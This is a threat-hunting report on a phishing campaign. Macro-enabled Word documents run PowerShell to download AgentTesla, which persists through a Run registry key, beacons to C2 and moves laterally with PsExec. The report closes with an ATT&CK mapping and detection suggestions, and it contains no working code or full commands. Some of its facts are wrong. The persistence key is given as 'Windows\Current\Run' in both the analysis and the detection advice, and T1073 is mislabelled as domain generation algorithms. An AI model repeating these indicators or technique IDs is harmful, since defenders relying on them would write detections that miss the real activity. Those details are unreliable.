James Calloway — Threat Hunter
Key Takeaways
- Malicious Word documents are increasingly used as initial access points in targeted attacks.
- The exploit chain leverages embedded macros to download and execute a remote payload.
- Obfuscation techniques mask the true intent of the document, complicating detection efforts.
Executive Summary
During our investigation of a recent cyber incident, we focused on a malicious Word document that was circulated within several organizations. Our analysis revealed that this document acted as a dropper for a more sophisticated payload, ultimately facilitating Remote Access Trojan (RAT) capabilities. The actor behind this campaign employed a combination of social engineering tactics and advanced evasion techniques, allowing the malware to achieve its objectives under the radar.
Initial Access
Initial access was gained through a phishing campaign wherein the actor distributed the malicious Word document via email attachments. The document was crafted to entice the recipient into enabling macros, with a message suggesting that macros were necessary for viewing full content. By employing the technique of Phishing (T1566), the actor effectively bypassed external defenses and initiated the compromise.
Execution & Persistence
Once the victim enabled the macros, our analysis confirmed that a PowerShell script was executed, which subsequently downloaded the primary payload from a remote server. The PowerShell command utilized the Invoke-WebRequest cmdlet, and the file path for the downloaded payload was found to be C:\Users\Public\Documents\temp_payload.exe. This executable, identified as AgentTesla, a known remote access Trojan, established persistence by creating a registry key at HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run\ to ensure it executed on system boot.
Command and Control
The sample we examined connected back to the C2 server via HTTP requests to a domain that was registered just days before the campaign launched. This C2 infrastructure exhibited characteristics of Domain Generation Algorithms (T1073), with additional behavior reminiscent of Application Layer Protocol (T1071) as it communicated using standard HTTP. This helped the actor blend in with normal traffic and evade network security devices. Throughout this phase, the implant periodically beaconed back to the C2, sending basic system information such as hostname, user tokens, and installed applications.
Lateral Movement & Discovery
During our investigation, we observed that the malware attempted lateral movement by leveraging credentials stored in memory, a technique associated with Credential Dumping (T1003). The actor primarily utilized PsExec, a legitimate Windows tool, to propagate the infection to other systems within the network. This lateral movement was particularly concerning as it indicated that the actor was not only targeting a single organization but was attempting to scale the breach to impact multiple endpoints.
Impact & Objectives
The main objectives of the intrusion appeared to be data exfiltration and the establishment of a persistent foothold within the targeted networks. AgentTesla allowed the actor to monitor keystrokes, capture screenshots, and exfiltrate sensitive files, which could compromise confidential information. Moreover, the actor aimed to siphon credentials to facilitate further access, potentially leading to a larger breach. The overall impact of this campaign could have included operational disruptions and significant reputational damage to the affected organizations.
MITRE ATT&CK Mapping
- T1566 – Phishing: Social engineering tactics used to lure victims into enabling malicious macros.
- T1071 – Application Layer Protocol: The malware communicated over HTTP to evade detection.
- T1003 – Credential Dumping: Attacks leveraging credential retrieval methods for lateral movement.
Detection Opportunities
- Monitor for suspicious PowerShell command executions that utilize
Invoke-WebRequest. - Implement alerts for abnormal registry modifications, particularly in
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run\. - Network traffic analysis should focus on unusual outbound HTTP requests to newly registered domains or domains exhibiting DGA behaviors.
Analyst Notes
In light of this investigation, it is imperative for security teams to implement comprehensive monitoring strategies surrounding macro-enabled documents and PowerShell activity. Organizations should elevate user awareness around phishing tactics and enforce strict policy measures concerning macro execution in Office documents. Additionally, maintaining an up-to-date inventory of network traffic patterns can assist in identifying anomalous behavior indicative of RAT activity.
Source: Original Report